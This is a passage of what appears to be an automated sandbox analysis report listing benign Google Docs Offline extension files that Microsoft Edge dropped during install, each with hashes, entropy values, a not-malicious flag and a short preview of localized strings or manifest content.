                                                                                                                                                                                                                                                                                                  SHA-512:E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "..... ...... ........ ......".. },.. "explanationofflinedisabled": {.. "message": ".... ........... ........ ......... ........ ....... Google Docs... .............., .... ............ ....... ..... ...... .... Google Docs .... ...... ............. ......, ........ ........ ... .......".. },.. "explanationofflineenabled": {.. "message": ".... ........... ......., .... .... ........ .......... .... ....... ..... ....... .... ..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\_locales\th\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1674
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.343724179386811
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
                                                                                                                                                                                                                                                                                                  MD5:64077E3D186E585A8BEA86FF415AA19D
                                                                                                                                                                                                                                                                                                  SHA1:73A861AC810DABB4CE63AD052E6E1834F8CA0E65
                                                                                                                                                                                                                                                                                                  SHA-256:D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
                                                                                                                                                                                                                                                                                                  SHA-512:56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": ".............. ............. Google .................................... ............................... Google ...... .................................................................".. },.. "explanationofflineenabled": {.. "message": "................................................................".. },.. "extdesc": {.. "message": "..... ..... ........

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\_locales\tr\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1063
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.853399816115876
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
                                                                                                                                                                                                                                                                                                  MD5:76B59AAACC7B469792694CF3855D3F4C
                                                                                                                                                                                                                                                                                                  SHA1:7C04A2C1C808FA57057A4CCEEE66855251A3C231
                                                                                                                                                                                                                                                                                                  SHA-256:B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
                                                                                                                                                                                                                                                                                                  SHA-512:2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\_locales\uk\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1333
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.686760246306605
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
                                                                                                                                                                                                                                                                                                  MD5:970963C25C2CEF16BB6F60952E103105
                                                                                                                                                                                                                                                                                                  SHA1:BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
                                                                                                                                                                                                                                                                                                  SHA-256:9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
                                                                                                                                                                                                                                                                                                  SHA-512:1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "........".. },.. "explanationofflinedisabled": {.. "message": ".. . ...... ....... ... ............. Google ........... ... ......... . .........., ......... . ............ .. ........ ........ Google .......... . ......... ......-............., .... ...... . .......".. },.. "explanationofflineenabled": {.. "message": ".. . ...... ......, ..... ... .... ...... .......... ........ ..... ... .......... .....".. },.. "extdesc": {.. "message": "........., ......... . ............ ........., .......... ....... .. ........... ... ....... .. ..........".. },.. "extname": {.. "message": "Goo

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\_locales\ur\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1263
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.861856182762435
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
                                                                                                                                                                                                                                                                                                  MD5:8B4DF6A9281333341C939C244DDB7648
                                                                                                                                                                                                                                                                                                  SHA1:382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
                                                                                                                                                                                                                                                                                                  SHA-256:5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
                                                                                                                                                                                                                                                                                                  SHA-512:FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "... ......".. },.. "explanationofflinedisabled": {.. "message": ".. .. .... .... Google Docs .. .... ....... ..... ....... .... ..... .... ... .. .. ....... .. ..... ... .. Google Docs ... ... .. ....... .. ..... ... .. .... ...... ..... .. .. .....".. },.. "explanationofflineenabled": {.. "message": ".. .. .... ... .... .. ... ... ...... ..... ... ..... .. .... ... .. ... ..... ... .... ....".. },.. "extdesc": {.. "message": ".......... .......... ... ....... . .... ... ....... .. ..... .. .... ...... ..... .... ... ..... .......".. },.. "extname": {.. "message": "Google Docs .. ....".. },.. "learnmore": {..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\_locales\vi\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1074
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.062722522759407
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
                                                                                                                                                                                                                                                                                                  MD5:773A3B9E708D052D6CBAA6D55C8A5438
                                                                                                                                                                                                                                                                                                  SHA1:5617235844595D5C73961A2C0A4AC66D8EA5F90F
                                                                                                                                                                                                                                                                                                  SHA-256:597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
                                                                                                                                                                                                                                                                                                  SHA-512:E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\_locales\zh_CN\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):879
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.7905809868505544
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
                                                                                                                                                                                                                                                                                                  MD5:3E76788E17E62FB49FB5ED5F4E7A3DCE
                                                                                                                                                                                                                                                                                                  SHA1:6904FFA0D13D45496F126E58C886C35366EFCC11
                                                                                                                                                                                                                                                                                                  SHA-256:E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
                                                                                                                                                                                                                                                                                                  SHA-512:F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\_locales\zh_HK\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1205
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.50367724745418
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
                                                                                                                                                                                                                                                                                                  MD5:524E1B2A370D0E71342D05DDE3D3E774
                                                                                                                                                                                                                                                                                                  SHA1:60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
                                                                                                                                                                                                                                                                                                  SHA-256:30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
                                                                                                                                                                                                                                                                                                  SHA-512:D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\_locales\zh_TW\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):843
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.76581227215314
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
                                                                                                                                                                                                                                                                                                  MD5:0E60627ACFD18F44D4DF469D8DCE6D30
                                                                                                                                                                                                                                                                                                  SHA1:2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
                                                                                                                                                                                                                                                                                                  SHA-256:F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
                                                                                                                                                                                                                                                                                                  SHA-512:6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\_locales\zu\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):912
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.65963951143349
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
                                                                                                                                                                                                                                                                                                  MD5:71F916A64F98B6D1B5D1F62D297FDEC1
                                                                                                                                                                                                                                                                                                  SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
                                                                                                                                                                                                                                                                                                  SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
                                                                                                                                                                                                                                                                                                  SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\_metadata\verified_contents.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):11406
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.745845607168024
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuH+svyw6r+cgTSJJT4LGkt:m8IEI4u8/EgG4
                                                                                                                                                                                                                                                                                                  MD5:0A68C9539A188B8BB4F9573F2F2321D6
                                                                                                                                                                                                                                                                                                  SHA1:E0F814FA4DCC04EDC6A5D39CBC1038979E88F0E5
                                                                                                                                                                                                                                                                                                  SHA-256:39E6C25D096AFD156644F07586D85E37F1F7B3DA9B636471E8D15CEB14DB184F
                                                                                                                                                                                                                                                                                                  SHA-512:13F133C173C6622B8E1B6F86A551CBC5B0B2446B3CF96E4AE8CA2646009B99E4A360C2DB3168CB94A488FAEBD215003DFA60D10150B7A85B5F8919900BD01CCC
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiIxMjgucG5nIiwicm9vdF9oYXNoIjoiZ2NWZy0xWWgySktRNVFtUmtjZGNmamU1dzVIc1JNN1ZCTmJyaHJ4eGZ5ZyJ9LHsicGF0aCI6Il9sb2NhbGVzL2FmL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJxaElnV3hDSFVNLWZvSmVFWWFiWWlCNU9nTm9ncUViWUpOcEFhZG5KR0VjIn0seyJwYXRoIjoiX2xvY2FsZXMvYW0vbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IlpPQWJ3cEs2THFGcGxYYjh4RVUyY0VkU0R1aVY0cERNN2lEQ1RKTTIyTzgifSx7InBhdGgiOiJfbG9jYWxlcy9hci9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiUjJVaEZjdTVFcEJfUUZtU19QeGstWWRrSVZqd3l6WEoxdURVZEMyRE9BSSJ9LHsicGF0aCI6Il9sb2NhbGVzL2F6L21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJZVVJ3Mmp4UU5Lem1TZkY0YS1xcTBzbFBSSFc4eUlXRGtMY2g4Ry0zdjJRIn0seyJwYXRoIjoiX2xvY2FsZXMvYmUvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IjNmRm9XYUZmUHJNelRXSkJsMXlqbUlyRDZ2dzlsa1VxdzZTdjAyUk1oVkEifSx7InBhdGgiOiJfbG9jYWxlcy9iZy9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiSXJ3M3RIem9xREx6bHdGa0hjTllOWFoyNmI0WWVwT2t4ZFN

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\dasherSettingSchema.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):854
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.284628987131403
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
                                                                                                                                                                                                                                                                                                  MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
                                                                                                                                                                                                                                                                                                  SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
                                                                                                                                                                                                                                                                                                  SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
                                                                                                                                                                                                                                                                                                  SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\manifest.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2525
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.417954053901
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj17x9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/AP7xgiVb
                                                                                                                                                                                                                                                                                                  MD5:5E425DC36364927B1348F6C48B68C948
                                                                                                                                                                                                                                                                                                  SHA1:9E411B88453DEF3F7CFCB3EAA543C69AD832B82F
                                                                                                                                                                                                                                                                                                  SHA-256:32D9C8DE71A40D71FC61AD52AA07E809D07DF57A2F4F7855E8FC300F87FFC642
                                                                                                                                                                                                                                                                                                  SHA-512:C19217B9AF82C1EE1015D4DFC4234A5CE0A4E482430455ABAAFAE3F9C8AE0F7E5D2ED7727502760F1B0656F0A079CB23B132188AE425E001802738A91D8C5D79
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\offscreendocument.html

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):97
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.862433271815736
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
                                                                                                                                                                                                                                                                                                  MD5:B747B5922A0BC74BBF0A9BC59DF7685F
                                                                                                                                                                                                                                                                                                  SHA1:7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
                                                                                                                                                                                                                                                                                                  SHA-256:B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
                                                                                                                                                                                                                                                                                                  SHA-512:7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\offscreendocument_main.js

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):122218
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.439997574414675
